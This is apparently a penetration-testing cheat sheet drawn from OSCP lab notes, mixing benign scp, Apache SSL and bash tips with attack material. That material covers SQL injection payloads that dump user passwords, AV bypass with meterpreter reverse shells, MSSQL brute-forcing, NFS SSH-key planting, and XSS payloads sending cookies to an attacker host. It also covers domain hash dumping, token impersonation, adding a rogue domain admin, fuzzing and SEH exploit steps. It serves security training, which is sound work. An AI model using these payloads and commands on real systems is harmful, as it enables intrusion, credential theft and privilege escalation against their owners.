CheatSheet (Short)

GitHub - slyth11907/Cheatsheets: Helped during my OSCP lab days.GitHub

SCP

[+] Secure Copy (scp) Cheatsheet
--------------------------------

[>] Copy remote file to local host:

$ scp your_username@ip:<remote_file> /some/local/directory

[>] Copy local file to remote host:

$ scp <local_file> your_username@192.168.0.10:/some/remote/directory

[>] Copy local directory to remote directory:

scp -r <local_dir> your_username@ip:/some/remote/directory/<remote_dir>

[>] Copy a file from one remote host to another:

scp your_username@<host1>:/some/remote/directory/foobar.txt your_username@<host2>:/some/remote/directory/

[>] Improve scp performance (use blowfish):

scp -c blowfish <local_file> your_username@ip:/some/remote/directory

SQL Injection

[+] Union Based SQL Injection

' or 1=1#

1' ORDER BY 10#

1' UNION SELECT version(),2#

1' UNION SELECT version(),database()#

1' UNION SELECT version(),user()#

1' UNION ALL SELECT table_name,2 from information_schema.tables#

1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"#

1' UNION ALL SELECT concat(user,char(58),password),2 from users#


sqlmap --url="<url>" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs

AV bypass

1. Generate executable using Veil.

2. In msfconsole setup psexec with relevant payload (windows/meterpreter/reverse_tcp)

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST ip
RHOST => ip
msf exploit(psexec) > set SMBUser user
SMBUser => user
msf exploit(psexec) > set SMBPass pass
SMBPass => pass
msf exploit(psexec) > set EXE::Custom /root/Desktop/Misc/Veil-master/payload.exe
EXE::Custom => /root/Desktop/Misc/Veil-master/payload.exe
msf exploit(psexec) > exploit

Apache SSL

# Enabling Self signed certificates on local website
    
1. Install OpenSSL

sudo apt-get install openssl

2. Run the following command to generate the self signed SSL certificates:

sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/ssl/certs/server.crt -keyout /etc/ssl/private/server.key

3. Enable SSL for Apache

sudo a2enmod ssl

4. Put the default-ssl site available creating a symbolic link

sudo ln -s /etc/apache2/sites-available/default-ssl.conf /etc/apache2/sites-enabled/000-default-ssl.conf

5. Edit the file default-ssl.conf

sudo nano /etc/apache2/sites-enabled/000-default-ssl.conf

Change the following lines to point to the certs:

SSLCertificateFile    /etc/ssl/certs/server.crt
SSLCertificateKeyFile /etc/ssl/private/server.key

6. Restart Apache

sudo /etc/init.d/apache2 restart

More information:
https://hallard.me/enable-ssl-for-apache-server-in-5-minutes/
https://www.sslshopper.com/article-how-to-create-and-install-an-apache-self-signed-certificate.html
http://www.akadia.com/services/ssh_test_certificate.html
https://www.sslshopper.com/apache-server-ssl-installation-instructions.html
http://www.emreakkas.com/linux-tips/invalid-command-sslengine-enabling-ssl-on-ubuntu-server

Attacking MS-SQL

[+] Attacking MSSQL with Metasploit

[>] Enumerate MSSQL Servers on the network:

msf > use auxiliary/scanner/mssql/mssql_ping
nmap -sU --script=ms-sql-info ip ip
Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio.

[>] Bruteforce MSSQL Database:

msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login

[>] Enumerate MSSQL Database:

msf > use auxiliary/admin/mssql/mssql_enum

[>] Gain shell using gathered credentials

msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp

Bash Scripting

Simple Bash Scripting Cheatsheet
--------------------------------

[+] nano Shortcuts
ctrl v			Next page.
ctrl y			Previous page.
ctrl w			Where is (find).
ctrl k			Cut that line of test.
ctrl x     		Exit editor.

[+] Create a text file:
touch file		Creates an empty file.
ifconfig > tmp	pipe the output of a command
nano file

[+] Create a file and append text to it:
ifconfig > tmp     
echo >> tmp
ping google.com -c3 >> tmp

[+] How to view a file:
cat file		Show entire contents of file.
more file		Show one page at a time.  Space bar for next page and (q) to exit.
head file		Show the first 10 lines.
head -15 file	Show the first 15 lines.
tail file		Show the last 10 lines.
tail -15 file	Show the last 15 lines.
tail -f file	Useful when viewing the output of a log file.

[+] pipe
cat tmp | grep Bcast	Feeds the output of one process to the input of another process.

[+] Processes
ps aux			Show all running process for all users.
kill -9 PID		Nicely kill a PID.

[+] Word Count
wc -l tmp2		Count the number of lines in a file

[+] cut
-d  delimiter
-f  fields

[+] sort
Sort by unique		sort -u file
sort IP addresses correct		sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n
cat tmp2 | cut -d '(' -f2 | cut -d ')' -f1 | sort -u		Isolate the IP address

[+] awk
awk '{print $1}' file 		Show the 1st column.
awk '{print $1,$5}' file 	Show the 1st and 5th columns.

[+] grep
grep -v		Remove a single string.
grep -v 'red' file

[+] egrep -v
Remove multiple strings	egrep -v '(red|white|blue)' file

[+] sed
sed 's/FOO/BAR/g' file 		Replace FOO with BAR.
sed 's/FOO//g' file 		Replace FOO with nothing.
sed '/^FOO/d' file 			Remove lines that start with FOO.

[+] colour
31=red 32=green 33=yellow 34=blue 35=magenta 36=cyan 
echo -e "\e[1;34mThis is a blue text.\e[0m"




Bash Scripts
------------

[+] Simple bash script:
#!/bin/bash
clear
echo
echo
print "Hello world."

[+] Make a file executable.
chmod +x file
chmod 755 file

[+] Variables
name=Bob
echo $name
user=$(whoami)
echo $user
echo 'Hello' $name. 'You are running as' $user.

#!/bin/bash
clear
echo "Hello World"
name=Bob
ip=`ifconfig | grep "Bcast:" | cut -d":" -f2 | cut -d" " -f1`
echo "Hello" $name "Your IP address is:" $ip

[+] User Input
read -p "Domain: " domain

#!/bin/bash
echo "Please input your domain:"
read -p "Domain:" domain
ping -c 5 $domain

[+] Check For No User Input
if [ -z $domain ]; then
	echo
	echo "#########################"
	echo
	echo "Invalid choice."
	echo
	exit
fi

[+] For loops
#!/bin/bash

for host in $(cat hosts.txt)
do
	command $host
done

[+] One Liners

Port Scan:
for port in $(cat Ports.txt); do nc -nzv ip $port & sleep 0.5; done

CTF CS

CTF Notes
---------

# Enumerate Users via Finger
finger user@ip

# Show nfs shares available
showmount -e ip

# User nfspysh to mount share and create .ssh directory
nfspysh -o server=ip:/home/user
mkdir .ssh
cd .ssh

# Generate ssh key pair
ssh-keygen
cp id_rsa.pub /tmp/authorized_keys

# Transfer attacker public key to host
put /tmp/authorized_keys
exit

# Login to SSH server with no password
SSH_AUTH_SOCK=0 ssh user@ip

Cookie Stealing

[+] Cookie Stealing:

[-] Start Web Service

python -m SimpleHTTPServer 80

[-] Use one of the following XSS payloads:

<script>document.location="http://ip/?c="+document.cookie;</script>
<script>new Image().src="http://ip/index.php?c="+document.cookie;</script>

Domain Admin Exploitation

[+] After compromising a Windows machine:

[>] List the domain administrators:
From Shell - net group "Domain Admins" /domain

[>] Dump the hashes (Metasploit)
msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE

[>] Find the admins (Metasploit)
spool /tmp/enumdomainusers.txt
msf > use auxiliary/scanner/smb/smb_enumusers_domain
msf > set smbuser Administrator
msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf > set rhosts ip/24
msf > set threads 8
msf > run

msf> spool off

[>] Compromise Admin's box
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token MYDOM\\adaministrator
meterpreter > getuid
meterpreter > shell

C:\> whoami
mydom\adaministrator
C:\> net user hacker /add /domain
C:\> net group "Domain Admins" hacker /add /domain

Exploit-Dev

Exploit Development Cheatsheet
------------------------------

[+] Fuzzing:

import socket

buffer = ["A"]
counter = 50

while len(buffer) <= 1000:
    buffer.append("A" * counter)
    counter = counter + 50

for buffstring in buffer:
    print "Fuzzing:" + str(len(buffstring))
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect( ("192.168.0.20", 5555) )
    sock.send(buffstring)
    sock.close()
	

[+] Bad Character Testing:

"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e"
"\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d"
"\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c"
"\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b"
"\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a"
"\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59"
"\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68"
"\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77"
"\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86"
"\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95"
"\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4"
"\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3"
"\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2"
"\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1"
"\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef"
"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe"
"\xff"


[+] Structured Exception Handler (SEH) Exploitation notes

- Crash the application
- Check SEH overwirte (view-seh chain)
- Find offset (!mona pattern_create <length>)
- Find certain SEH references to the cyclic pattern (!mona findmsp)
- Verify offset to NSEH (Next Exception)
- Find POP/POP/RET address with mona (!mona seh -cpb <bad chars>)
- Add short jump into payload to jump ofver SEH ("\xeb\x06" + 2 bytes of padding)
- Add shellcode to the payload
- Ensure existing padding to make sure the crash still happens.